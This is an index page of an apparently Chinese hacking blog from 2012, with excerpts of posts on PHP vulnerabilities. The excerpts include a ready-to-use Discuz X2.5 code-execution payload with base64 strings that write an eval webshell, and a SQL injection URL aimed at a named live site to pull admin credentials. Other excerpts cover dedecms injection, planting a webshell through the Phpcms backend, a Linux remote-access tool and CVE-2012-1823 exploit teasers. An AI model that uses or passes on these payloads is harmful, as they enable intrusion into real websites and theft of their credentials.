星期六 , 2012 年 05 月 19 日 | 订阅 RSS

php包含漏洞替代技术

2012 年 05 月 19 日 | 留下评论 | 发表在 Hack

php开发者们犯得一个基本的错误是把一个不正当的变量传递给系统函数,特别是include()和require()这两个函数。
这个常见的错误导致了众所周知的远程文件包含漏洞和本地文件包含漏洞。在过去的几年中,php已经开始试图通过缺省设置来消除或限制这种漏洞的所带来影响。
但即使是简单的本地文件包含,也会有新的技术去利用这些漏洞来导致远程命令的执行。

================
介绍php包含漏洞
================
文件包含漏洞的要点是要去找到一个方法来包含带有你的php恶意代码的文件。

继续阅读 →

ThinkPHP framework 任意代码执行漏洞预警

2012 年 05 月 09 日 | 留下评论 | 发表在 Hack

ThinkPHP是一个国内使用很广泛的老牌PHP MVC框架。貌似国内有不少创业公司或者项目都用了这个框架。

最近官方发布了一个安全补丁,官方表述是:该URL安全漏洞会造成用户在客户端伪造URL,执行非法代码。

可是貌似大多数开发者和使用者并没有注意到此漏洞的危害性,应者了了,更不用说有多少人去升级了。随后我对其进行了分析,发现此问题果然是一个非常严重的问题,只要使用了thinkphp框架,就可以直接执行任意php代码。特此发帖预警各位。

我们来分析一下官方的补丁:

/trunk/ThinkPHP/Lib/Core/Dispatcher.class.php
125 – $res = preg_replace(‘@(w+)’.$depr.’([^'.$depr.'\/]+)@e’, ‘$var[\'\\1\']=”\\2″;’, implode($depr,$paths));
125 + $res = preg_replace(‘@(w+)’.$depr.’([^'.$depr.'\/]+)@e’, ‘$var[\'\\1\']=\’\\2\’;', implode($depr,$paths));

继续阅读 →

开源linux远程控制工具 – n00bRAT

2012 年 05 月 09 日 | 留下评论 | 发表在 Hack

n00bRAT是一款开源、基于HTTP的linux平台下的远程控制工具。
==========================================================
HOW TO INSTALL
———————————————————
Method#1:
(a.) Open a Command Shell
(b.) Change Location to n00bRAT’s Directory
(c.) Execute following process:
gcc -o http ABK_n00bRAT.c

继续阅读 →

CVE-2012-1823(PHP-CGI RCE)的PoC及技术挑战-转

2012 年 05 月 09 日 | 留下评论 | 发表在 Hack

国外又发布了一个牛逼闪闪的php cgi远程任意代码执行漏洞:http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/

粗看一下貌似没啥危害,因为php做了防范,在cgi这个sapi下是无法使用-r,-f等直接执行命令的参数的。只有少数几个参数可以使用,因此公告里也就给出了使用-s参数读取源文件的poc。

另外关于RCE的PoC原文没有给出,不过说明的确可以远程执行代码。那么他是怎么做到的呢?我粗略想了想,可以利用的参数只有一个-d参数了,作用是给php定义一个ini的值。

那么利用它能做什么呢?我给出如下两个RCE的PoC方案:

继续阅读 →

CVE-2012-1823 php-cgi漏洞 metasploit利用脚本

2012 年 05 月 09 日 | 留下评论 | 发表在 Hack

继续阅读 →

dedecms5.7最新注入和上传漏洞

2012 年 05 月 02 日 | 留下评论 | 发表在 Hack

注入漏洞。

首先访问/data/admin/ver.txt页面获取系统最后升级时间,
然后访问/member/ajax_membergroup.php?action=post&membergroup=1页面,
如图说明存在该漏洞。

继续阅读 →

Phpcms v9后台拿webshell

2012 年 05 月 02 日 | 留下评论 | 发表在 Hack

操作方法:

进入后台后点击界面–模版风格–随便找个页面点击修改

插入代码后点击提交..

继续阅读 →

DZ x2.5 代码执行0day

2012 年 05 月 02 日 | 留下评论 | 发表在 Hack

1.注册任意账户

2.登陆用户,发表blog日志(注意是日志) //点击一下中间注册的用户名 就看到了

3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} //所使用代码

ok

“)?>

4.访问日志,论坛根目录下生成demo.php,一句发密码C

phpweb 注入漏洞

2012 年 03 月 23 日 | 留下评论 | 发表在 Hack

一天旁注的时候发现这个系统的,
搜索了下,使用的人还很多,就看了下,漏洞一大堆,
找到一个就没看了,

下载地址:

http://down.phpweb.net/soft/phpweb_shop_v137.zip

测试代码:

http://www.lpboke.com/shop/class/index.php?showbrandid=0′ AND (SELECT 1 FROM (SELECT count( * ) , concat((SELECT concat( 0×23, user, 0x7e,password, 0×23 ) FROM dev_base_admin limit 0,1),floor( rand( 0 ) *2 ))x FROM information_schema.tables GROUP BY x)a)–%20

linux嗅探工具Dsniff安装笔记

2012 年 03 月 11 日 | 留下评论 | 发表在 Hack

wget:

http://www.3est.com/linux/openssl-0.9.7i.tar.gz

http://www.3est.com/linux/libnids-1.18.tar.gz

http://www.3est.com/linux/libpcap-0.7.2.tar.gz

http://www.3est.com/linux/libnet-1.0.2a.tar.gz

http://www.3est.com/linux/db-4.7.25.tar.gz

http://www.3est.com/linux/dsniff-2.3.tar.gz

一、安装gcc

# yum -y install gcc

继续阅读 →

下一页 →